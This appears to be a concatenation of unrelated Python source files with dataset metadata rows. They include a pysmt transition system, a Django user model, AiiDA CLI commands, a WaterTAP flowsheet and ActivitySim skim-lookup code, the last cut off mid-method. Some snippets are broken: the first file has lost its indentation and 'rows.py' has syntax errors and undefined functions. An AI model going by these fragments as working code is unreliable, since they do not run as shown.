from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
def transition_system(env: PysmtEnv) -> (frozenset, FNode, FNode, FNode):
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
fact = mgr.Symbol("fact", types.INT)
i = mgr.Symbol("i", types.INT)
n = mgr.Symbol("n", types.INT)
pc = mgr.Symbol("pc", types.INT)
x_fact = symb_to_next(mgr, fact)
x_i = symb_to_next(mgr, i)
x_n = symb_to_next(mgr, n)
x_pc = symb_to_next(mgr, pc)
symbols = frozenset([fact, i, n, pc])
n_locs = 6
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(n >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(n, ints[1]))), x_pcend),
# pc = 0 & n >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(n, ints[1])), x_pcs[1]),
# pc = 1 : 2,
mgr.Implies(pcs[1], x_pcs[2]),
# pc = 2 : 3,
mgr.Implies(pcs[2], x_pcs[3]),
# pc = 3 & !(i <= fact) : -1,
mgr.Implies(mgr.And(pcs[3], mgr.Not(mgr.LE(i, fact))), x_pcend),
# pc = 3 & i <= fact : 4,
mgr.Implies(mgr.And(pcs[3], mgr.LE(i, fact)), x_pcs[4]),
# pc = 4 : 5,
mgr.Implies(pcs[4], x_pcs[5]),
# pc = 5 : 3,
mgr.Implies(pcs[5], x_pcs[3]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 0 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 0 & pc' = 1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 1 & pc' = 2) -> (n' = n & i' = i & fact' = 2),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, ints[2]))),
# (pc = 2 & pc' = 3) -> (n' = n & i' = 1 & fact' = fact),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, ints[1]),
mgr.Equals(x_fact, fact))),
# (pc = 3 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[3], x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 3 & pc' = 4) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 4 & pc' = 5) -> (n' = n & i' = i & fact' = fact*i),
mgr.Implies(
mgr.And(pcs[4], x_pcs[5]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, mgr.Times(fact, i)))),
# (pc = 5 & pc' = 3) -> (n' = n & i' = i+1 & fact' = fact),
mgr.Implies(
mgr.And(pcs[5], x_pcs[3]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, mgr.Plus(i, ints[1])),
mgr.Equals(x_fact, fact))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
| 36.087719
| 78
| 0.478123
|
498bbcf45328df67e5c452a7a072e5cc8ce11b94
| 1,211
|
py
|
Python
|
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager,\
PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and save a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that support using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
| 31.868421
| 76
| 0.668043
|
1f1f58312704dd4b88096f01aa0cb630f43f0c62
| 1,238
|
py
|
Python
|
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | null | null | null |
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | null | null | null |
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | 1
|
2019-04-17T02:21:40.000Z
|
2019-04-17T02:21:40.000Z
|
import re
# init a thing
# decide type in things
# ocer ttype in stings
# return a row with ids and x and y
# i need x,y
class eg(object):
id=0
def __init__(i, egs, xs=[], ys=[]):
eg.id = i.id = eg.id + 1
i.xs, i.ys, i.egs = xs, ys, egs
class egs(object):
ignore = "?"
less = "<"
more = ">"
klass = "!"
ys = "<>!"
def __init__(i):
i.klass = None
i.xs, i.ys, i.less, i.more = [],[],[],[]
def also(i,c):
if egs.less in c.name : i.less += [c]
elif egs.more in c,name : i.more += [c]
elif egs.klass in c.name : i.klass = c
return c
def rows(i,file):
for cnt,(xs,ys) in enumerate(xy(rows(file))):
if cnt==0:
i.xs = [ col(x,n) for n,x in enumerate(xs)]
i.ys = [i.also(col(y,n)) for n,y in enumerate(ys)]
else:
yield eg(i, xs=xs, ys=ys)
class col(object):
def __init__(i, name,pos):
i.name, i.pos = name, pos
i.log = None # place to stats about a number
i.prep = None # coerce function string to something
def train(i, z, n=1):
if z is egs.ignore: return z
if not i.log:
z, i.prep = atom(z)
i.log = bins() if i.prep == str else around()
i.log.train( pre(z), n )
| 24.76
| 58
| 0.526656
|
3fd4e1f725569e04e20742c77a12f629b59549a8
| 4,792
|
py
|
Python
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 180
|
2019-07-12T07:45:26.000Z
|
2022-03-22T13:16:57.000Z
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 2,325
|
2019-07-04T13:41:44.000Z
|
2022-03-31T12:17:10.000Z
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 88
|
2019-07-06T01:42:39.000Z
|
2022-03-18T14:20:09.000Z
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""`verdi database` commands."""
# pylint: disable=unused-argument
import click
from aiida.backends.general.migrations.duplicate_uuids import TABLES_UUID_DEDUPLICATION
from aiida.cmdline.commands.cmd_verdi import verdi
from aiida.cmdline.params import options
from aiida.cmdline.utils import decorators
@verdi.group('database')
def verdi_database():
"""Inspect and manage the database.
.. deprecated:: v2.0.0
"""
@verdi_database.command('version')
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'The same information is now available through `verdi status`.\n'
)
def database_version():
"""Show the version of the database.
The database version is defined by the tuple of the schema generation and schema revision.
.. deprecated:: v2.0.0
"""
@verdi_database.command('migrate')
@options.FORCE()
@click.pass_context
@decorators.deprecated_command(
'This command has been deprecated and will be removed soon (in v3.0). '
'Please call `verdi storage migrate` instead.\n'
)
def database_migrate(ctx, force):
"""Migrate the database to the latest schema version.
.. deprecated:: v2.0.0
"""
from aiida.cmdline.commands.cmd_storage import storage_migrate
ctx.forward(storage_migrate)
@verdi_database.group('integrity')
def verdi_database_integrity():
"""Check the integrity of the database and fix potential issues.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-duplicate-uuid')
@click.option(
'-t',
'--table',
type=click.Choice(TABLES_UUID_DEDUPLICATION),
default='db_dbnode',
help='The database table to operate on.'
)
@click.option(
'-a', '--apply-patch', is_flag=True, help='Actually apply the proposed changes instead of performing a dry run.'
)
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_duplicate_uuid(table, apply_patch):
"""Detect and fix entities with duplicate UUIDs.
Before aiida-core v1.0.0, there was no uniqueness constraint on the UUID column of the node table in the database
and a few other tables as well. This made it possible to store multiple entities with identical UUIDs in the same
table without the database complaining. This bug was fixed in aiida-core=1.0.0 by putting an explicit uniqueness
constraint on UUIDs on the database level. However, this would leave databases created before this patch with
duplicate UUIDs in an inconsistent state. This command will run an analysis to detect duplicate UUIDs in a given
table and solve it by generating new UUIDs. Note that it will not delete or merge any rows.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-invalid-links')
@decorators.with_dbenv()
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_invalid_links():
"""Scan the database for invalid links.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-invalid-nodes')
@decorators.with_dbenv()
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_invalid_nodes():
"""Scan the database for invalid nodes.
.. deprecated:: v2.0.0
"""
@verdi_database.command('summary')
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'Please call `verdi storage info` instead.\n'
)
def database_summary():
"""Summarise the entities in the database.
.. deprecated:: v2.0.0
"""
| 36.030075
| 118
| 0.6851
|
e2e0830fb7849389dc6ad79c2aed0156c70388e4
| 354
|
py
|
Python
|
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
# def solution(s):
# answer = int(s)
# return answer
# int()안쓰고 만들어보기
def solution(s):
answer = 0
for idx, num in enumerate(s[::-1]):
if num == '-':
answer *= -1
else:
answer += int(num) * (10 ** idx)
return answer
if __name__ == '__main__':
s = '-1234'
print(solution(s))
| 16.857143
| 44
| 0.474576
|
a2f476557b023f7c27e396738445f160b5b09203
| 5,972
|
py
|
Python
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 4
|
2021-11-06T01:13:22.000Z
|
2022-02-08T21:16:38.000Z
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 233
|
2021-10-13T12:53:44.000Z
|
2022-03-31T21:59:50.000Z
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 12
|
2021-11-01T19:11:03.000Z
|
2022-03-08T22:20:58.000Z
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
from pyomo.environ import (
ConcreteModel,
Objective,
Expression,
Constraint,
Param,
TransformationFactory,
value,
units as pyunits,
)
from pyomo.network import Arc
from pyomo.util import infeasible
from idaes.core import FlowsheetBlock
from idaes.core.util.scaling import (
calculate_scaling_factors,
unscaled_constraints_generator,
unscaled_variables_generator,
badly_scaled_var_generator,
)
from idaes.core.util.initialization import propagate_state
from watertap.examples.flowsheets.full_treatment_train.flowsheet_components import (
pretreatment_NF,
desalination,
gypsum_saturation_index,
translator_block,
costing,
)
from watertap.examples.flowsheets.full_treatment_train.model_components import (
property_models,
)
from watertap.examples.flowsheets.full_treatment_train.util import (
solve_block,
check_dof,
)
def build_components(m, has_bypass=True):
# build flowsheet
property_models.build_prop(m, base="ion")
pretrt_port = pretreatment_NF.build_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
property_models.build_prop(m, base="TDS")
translator_block.build_tb(
m, base_inlet="ion", base_outlet="TDS", name_str="tb_pretrt_to_desal"
)
# Arc to translator block
m.fs.s_pretrt_tb = Arc(
source=pretrt_port["out"], destination=m.fs.tb_pretrt_to_desal.inlet
)
property_models.build_prop(m, base="eNRTL")
gypsum_saturation_index.build(m, section="pretreatment")
m.fs.NF.area.fix(175)
if has_bypass:
m.fs.splitter.split_fraction[0, "bypass"].fix(0.50)
m.fs.removal_Ca = Expression(
expr=(
m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Ca"]
- m.fs.mixer.mixed_state[0].flow_mass_phase_comp["Liq", "Ca"]
)
/ m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Ca"]
)
m.fs.removal_Mg = Expression(
expr=(
m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Mg"]
- m.fs.mixer.mixed_state[0].flow_mass_phase_comp["Liq", "Mg"]
)
/ m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Mg"]
)
def build(m, has_bypass=True):
"""
Build a flowsheet with nanofiltration as the pretreatment process.
"""
build_components(m, has_bypass=has_bypass)
# annual water production
m.fs.treated_flow_vol = Expression(
expr=m.fs.tb_pretrt_to_desal.properties_out[0].flow_vol
)
costing.build_costing(m, NF_type="ZO")
return m
def scale(m, has_bypass=True):
pretreatment_NF.scale_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
calculate_scaling_factors(m.fs.tb_pretrt_to_desal)
def initialize(m, has_bypass=True):
optarg = {"nlp_scaling_method": "user-scaling"}
pretreatment_NF.initialize_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
m.fs.pretrt_saturation.properties.initialize(optarg=optarg)
propagate_state(m.fs.s_pretrt_tb)
m.fs.tb_pretrt_to_desal.initialize(optarg=optarg)
def report(m, has_bypass=True):
pretreatment_NF.display_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
m.fs.tb_pretrt_to_desal.report()
def solve_flowsheet(has_bypass=True):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
build(m, has_bypass=has_bypass)
TransformationFactory("network.expand_arcs").apply_to(m)
# scale
scale(m, has_bypass=has_bypass)
calculate_scaling_factors(m)
# initialize
initialize(m, has_bypass=has_bypass)
check_dof(m)
solve_block(m, tee=True, fail_flag=True)
# report
report(m, has_bypass=has_bypass)
return m
def simulate(m, check_termination=True):
return solve_block(m, tee=False, fail_flag=check_termination)
def set_optimization_components(m, system_recovery, **kwargs):
# unfix variables
m.fs.splitter.split_fraction[0, "bypass"].unfix()
m.fs.splitter.split_fraction[0, "bypass"].setlb(0.001)
m.fs.splitter.split_fraction[0, "bypass"].setub(0.99)
m.fs.NF.area.unfix()
m.fs.NF.area.setlb(0.1)
m.fs.NF.area.setub(1000)
m.fs.max_conc_factor_target = Param(initialize=3.5, mutable=True)
m.fs.eq_max_conc_NF = Constraint(
expr=m.fs.NF.feed_side.properties_out[0].mass_frac_phase_comp["Liq", "Ca"]
<= m.fs.max_conc_factor_target
* m.fs.feed.properties[0].mass_frac_phase_comp["Liq", "Ca"]
)
def set_up_optimization(m, system_recovery=0.50, **kwargs):
set_optimization_components(m, system_recovery, **kwargs)
calculate_scaling_factors(m)
check_dof(m, 2)
def optimize(m, check_termination=True):
return solve_block(m, tee=True, fail_flag=check_termination)
def optimize_flowsheet(system_recovery=0.50, **kwargs):
m = solve_flowsheet(**kwargs)
set_up_optimization(m, system_recovery=system_recovery, **kwargs)
optimize(m)
print("===================================" "\n Optimization ")
report(m, **kwargs)
return m
if __name__ == "__main__":
m = solve_flowsheet(True)
| 30.625641
| 84
| 0.6785
|
587eaab89ea47cbe63547e92a1ad83f750c531a7
| 28,562
|
py
|
Python
|
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
# ActivitySim
# See full license in LICENSE.txt.
from builtins import range
from builtins import object
import logging
import numpy as np
import pandas as pd
from activitysim.core.util import quick_loc_series
logger = logging.getLogger(__name__)
NOT_IN_SKIM_ZONE_ID = -1
NOT_IN_SKIM_NAN = np.nan
ROW_MAJOR_LAYOUT = True
class OffsetMapper(object):
"""
Utility to map skim zone ids to ordinal offsets (e.g. numpy array indices)
Can map either by a fixed offset (e.g. -1 to map 1-based to 0-based)
or by an explicit mapping of zone id to offset (slower but more flexible)
Internally, there are two representations:
offset_int:
int offset which when added to zone_id yields skim array index (e.g. -1 to map 1-based zones to 0-based index)
offset_series:
pandas series with zone_id index and skim array offset values. Ordinarily, index is just range(0, omx_size)
if series has duplicate offset values, this can map multiple zone_ids to a single skim array index
(e.g. can map maz zone_ids to corresponding taz skim offset)
"""
def __init__(self, offset_int=None, offset_list=None, offset_series=None):
self.offset_int = self.offset_series = None
assert (offset_int is not None) + (offset_list is not None) + (offset_series is not None) <= 1
if offset_int is not None:
self.set_offset_int(offset_int)
elif offset_list is not None:
self.set_offset_list(offset_list)
elif offset_series is not None:
self.set_offset_series(offset_series)
def print_offset(self, message=''):
assert (self.offset_int is not None) or (self.offset_series is not None)
if self.offset_int is not None:
print(f"{message} offset_int: {self.offset_int}")
elif self.offset_series is not None:
print(f"{message} offset_series:\n {self.offset_series}")
else:
print(f"{message} offset: None")
def set_offset_series(self, offset_series):
"""
Parameters
----------
offset_series: pandas.Series
series with zone_id index and skim array offset values (can map many zone_ids to skim array index)
"""
assert isinstance(offset_series, pd.Series)
self.offset_series = offset_series
self.offset_int = None
def set_offset_list(self, offset_list):
"""
Convenience method to set offset_series using an integer list the same size as target skim dimension
with implicit skim index mapping (e.g. an omx mapping as returned by omx_file.mapentries)
Parameters
----------
offset_list : list of int
"""
assert isinstance(offset_list, list) or isinstance(offset_list, np.ndarray)
if isinstance(offset_list, np.ndarray):
offset_list = list(offset_list)
# - for performance, check if this is a simple range that can ber represented by an int offset
first_offset = offset_list[0]
if (offset_list == list(range(first_offset, len(offset_list)+first_offset))):
offset_int = -1 * first_offset
self.set_offset_int(offset_int)
else:
offset_series = pd.Series(data=list(range(len(offset_list))), index=offset_list)
self.set_offset_series(offset_series)
def set_offset_int(self, offset_int):
"""
specify int offset which when added to zone_id yields skim array index (e.g. -1 to map 1-based to 0-based)
Parameters
----------
offset_int : int
"""
# should be some duck subtype of integer (but might be, say, numpy.int64)
assert int(offset_int) == offset_int
self.offset_int = int(offset_int)
self.offset_series = None
def map(self, zone_ids):
"""
map zone_ids to skim indexes
Parameters
----------
zone_ids : list-like (numpy.ndarray, pandas.Int64Index, or pandas.Series)
Returns
-------
offsets : numpy array of int
"""
if self.offset_series is not None:
assert(self.offset_int is None)
assert isinstance(self.offset_series, pd.Series)
# FIXME - faster to use series.map if zone_ids is a series?
offsets = quick_loc_series(zone_ids, self.offset_series).fillna(NOT_IN_SKIM_ZONE_ID).astype(int)
elif self.offset_int:
assert (self.offset_series is None)
# apply integer offset, but map NOT_IN_SKIM_ZONE_ID to self
offsets = np.where(zone_ids == NOT_IN_SKIM_ZONE_ID, NOT_IN_SKIM_ZONE_ID, zone_ids + self.offset_int)
else:
offsets = zone_ids
return offsets
class SkimDict(object):
"""
A SkimDict object is a wrapper around a dict of multiple skim objects,
where each object is identified by a key.
Note that keys are either strings or tuples of two strings (to support stacking of skims.)
"""
def __init__(self, skim_tag, skim_info, skim_data):
logger.info(f"SkimDict init {skim_tag}")
self.skim_tag = skim_tag
self.skim_info = skim_info
self.usage = set() # track keys of skims looked up
self.offset_mapper = self._offset_mapper() # (in function so subclass can override)
self.omx_shape = skim_info.omx_shape
self.skim_data = skim_data
self.dtype = np.dtype(skim_info.dtype_name) # so we can coerce if we have missing values
# - skim_dim3 dict maps key1 to dict of key2 absolute offsets into block
# DRV_COM_WLK_BOARDS: {'MD': 4, 'AM': 3, 'PM': 5}, ...
self.skim_dim3 = {}
for skim_key, offset in skim_info.block_offsets.items():
if isinstance(skim_key, tuple):
key1, key2 = skim_key
self.skim_dim3.setdefault(key1, {})[key2] = offset
logger.info(f"SkimDict.build_3d_skim_block_offset_table registered {len(self.skim_dim3)} 3d keys")
def _offset_mapper(self):
"""
Return an OffsetMapper to set self.offset_mapper for use with skims
This allows subclasses (e.g. MazSkimDict) to 'tweak' the parent offset mapper.
Returns
-------
OffsetMapper
"""
offset_mapper = OffsetMapper()
if self.skim_info.offset_map is not None:
offset_mapper.set_offset_list(offset_list=self.skim_info.offset_map)
else:
# assume this is a one-based skim map
offset_mapper.set_offset_int(-1)
return offset_mapper
@property
def zone_ids(self):
"""
Return list of zone_ids we grok in skim index order
Returns
-------
ndarray of int domain zone_ids
"""
if self.offset_mapper.offset_series is not None:
ids = self.offset_mapper.offset_series.index.values
else:
ids = np.array(range(self.omx_shape[0])) - self.offset_mapper.offset_int
return ids
def get_skim_usage(self):
"""
return set of keys of skims looked up. e.g. {'DIST', 'SOV'}
Returns
-------
set:
"""
return self.usage
def _lookup(self, orig, dest, block_offsets):
"""
Return list of skim values of skims(s) at orig/dest for the skim(s) at block_offset in skim_data
Supplying a single int block_offset makes the lookup 2-D
Supplying a list of block_offsets (same length as orig and dest lists) allows 3D lookup
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
block_offsets: int or list of dim3 blockoffsets for the od pairs
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
# fixme - remove?
assert not (np.isnan(orig) | np.isnan(dest)).any()
# only working with numpy in here
orig = np.asanyarray(orig).astype(int)
dest = np.asanyarray(dest).astype(int)
mapped_orig = self.offset_mapper.map(orig)
mapped_dest = self.offset_mapper.map(dest)
if ROW_MAJOR_LAYOUT:
result = self.skim_data[block_offsets, mapped_orig, mapped_dest]
else:
result = self.skim_data[mapped_orig, mapped_dest, block_offsets]
# FIXME - should return nan if not in skim (negative indices wrap around)
in_skim = (mapped_orig >= 0) & (mapped_orig < self.omx_shape[0]) & \
(mapped_dest >= 0) & (mapped_dest < self.omx_shape[1])
# if not ((in_skim | (orig == NOT_IN_SKIM_ZONE_ID) | (dest == NOT_IN_SKIM_ZONE_ID)).all()):
# print(f"orig\n{orig}")
# print(f"dest\n{dest}")
# print(f"in_skim\n{in_skim}")
# check for bad indexes (other than NOT_IN_SKIM_ZONE_ID)
assert (in_skim | (orig == NOT_IN_SKIM_ZONE_ID) | (dest == NOT_IN_SKIM_ZONE_ID)).all(), \
f"{(~in_skim).sum()} od pairs not in skim"
if not in_skim.all():
result = np.where(in_skim, result, NOT_IN_SKIM_NAN).astype(self.dtype)
return result
def lookup(self, orig, dest, key):
"""
Return list of skim values of skims(s) at orig/dest in skim with the specified key (e.g. 'DIST')
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
key: str
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
self.usage.add(key)
block_offset = self.skim_info.block_offsets.get(key)
assert block_offset is not None, f"SkimDict lookup key '{key}' not in skims"
try:
result = self._lookup(orig, dest, block_offset)
except Exception as err:
logger.error("SkimDict lookup error: %s: %s", type(err).__name__, str(err))
logger.error(f"key {key}")
logger.error(f"orig max {orig.max()} min {orig.min()}")
logger.error(f"dest max {dest.max()} min {dest.min()}")
raise err
return result
def lookup_3d(self, orig, dest, dim3, key):
"""
3D lookup of skim values of skims(s) at orig/dest for stacked skims indexed by dim3 selector
The idea is that skims may be stacked in groups with a base key and a dim3 key (usually a time of day key)
On import (from omx) skims stacks are represented by base and dim3 keys seperated by a double_underscore
e.g. DRV_COM_WLK_BOARDS__AM indicates base skim key DRV_COM_WLK_BOARDS with a time of day (dim3) of 'AM'
Since all the skimsa re stored in a single contiguous 3D array, we can use the dim3 key as a third index
and thus rapidly get skim values for a list of (orig, dest, tod) tuples using index arrays ('fancy indexing')
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
block_offsets: list with one dim3 key for each orig/dest pair
Returns
-------
Numpy.ndarray: list of skim values
"""
self.usage.add(key) # should we keep usage stats by (key, dim3)?
assert key in self.skim_dim3, f"3d skim key {key} not in skims."
# map dim3 to block_offsets
skim_keys_to_indexes = self.skim_dim3[key]
# skim_indexes = dim3.map(skim_keys_to_indexes).astype('int')
try:
block_offsets = np.vectorize(skim_keys_to_indexes.get)(dim3) # this should be faster than map
result = self._lookup(orig, dest, block_offsets)
except Exception as err:
logger.error("SkimDict lookup_3d error: %s: %s", type(err).__name__, str(err))
logger.error(f"key {key}")
logger.error(f"orig max {orig.max()} min {orig.min()}")
logger.error(f"dest max {dest.max()} min {dest.min()}")
logger.error(f"skim_keys_to_indexes: {skim_keys_to_indexes}")
logger.error(f"dim3 {np.unique(dim3)}")
logger.error(f"dim3 block_offsets {np.unique(block_offsets)}")
raise err
return result
def wrap(self, orig_key, dest_key):
"""
return a SkimWrapper for self
"""
return SkimWrapper(self, orig_key, dest_key)
def wrap_3d(self, orig_key, dest_key, dim3_key):
"""
return a SkimWrapper for self
"""
return Skim3dWrapper(self, orig_key, dest_key, dim3_key)
class SkimWrapper(object):
"""
A SkimWrapper object is an access wrapper around a SkimDict of multiple skim objects,
where each object is identified by a key.
This is just a way to simplify expression files by hiding the and orig, dest arguments
when the orig and dest vectors are in a dataframe with known column names (specified at init time)
The dataframe is identified by set_df because it may not be available (e.g. due to chunking)
at the time the SkimWrapper is instantiated.
When the user calls skims[key], key is an identifier for which skim
to use, and the object automatically looks up impedances of that skim
using the specified orig_key column in df as the origin and
the dest_key column in df as the destination. In this way, the user
does not do the O-D lookup by hand and only specifies which skim to use
for this lookup. This is the only purpose of this object: to
abstract away the O-D lookup and use skims by specifying which skim
to use in the expressions.
Note that keys are either strings or tuples of two strings (to support stacking of skims.)
"""
def __init__(self, skim_dict, orig_key, dest_key):
"""
Parameters
----------
skim_dict: SkimDict
orig_key: str
name of column in dataframe to use as implicit orig for lookups
dest_key: str
name of column in dataframe to use as implicit dest for lookups
"""
self.skim_dict = skim_dict
self.orig_key = orig_key
self.dest_key = dest_key
self.df = None
def set_df(self, df):
"""
Set the dataframe
Parameters
----------
df : DataFrame
The dataframe which contains the origin and destination ids
Returns
-------
self (to facilitiate chaining)
"""
assert self.orig_key in df, f"orig_key '{self.orig_key}' not in df columns: {list(df.columns)}"
assert self.dest_key in df, f"dest_key '{self.dest_key}' not in df columns: {list(df.columns)}"
self.df = df
return self
def lookup(self, key, reverse=False):
"""
Generally not called by the user - use __getitem__ instead
Parameters
----------
key : hashable
The key (identifier) for this skim object
od : bool (optional)
od=True means lookup standard origin-destination skim value
od=False means lookup destination-origin skim value
Returns
-------
impedances: pd.Series
A Series of impedances which are elements of the Skim object and
with the same index as df
"""
assert self.df is not None, "Call set_df first"
if reverse:
s = self.skim_dict.lookup(self.df[self.dest_key], self.df[self.orig_key], key)
else:
